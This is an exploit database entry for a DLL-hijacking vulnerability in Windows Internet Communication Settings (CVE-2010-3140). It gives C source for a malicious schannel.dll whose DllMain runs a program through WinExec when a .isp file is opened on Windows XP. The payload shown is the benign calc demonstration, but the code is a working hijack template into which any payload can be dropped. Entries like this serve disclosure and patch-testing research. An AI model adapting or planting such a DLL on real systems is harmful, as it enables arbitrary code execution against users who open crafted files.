Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking
Author: ALPdaemon
type: local
platform: windows
port:
date_added: 2010-08-25
date_updated: 2010-08-25
verified: 1
codes: CVE-2010-3140;OSVDB-67552
tags:
aliases:
screenshot_url:
application_url:
/*
# Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit
(schannel.dll)
# Date: 25/08/2010
# Author: ALPdaemon
# Email: ALPdaemon (at) yahoo (dot) com
# Software Link: N/A
# Tested on: Windows XP SP3 English
# Extension: .isp
*/
#include <windows.h>
int alpdaemon()
{
WinExec("calc", SW_SHOW);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
alpdaemon();
return 0;
}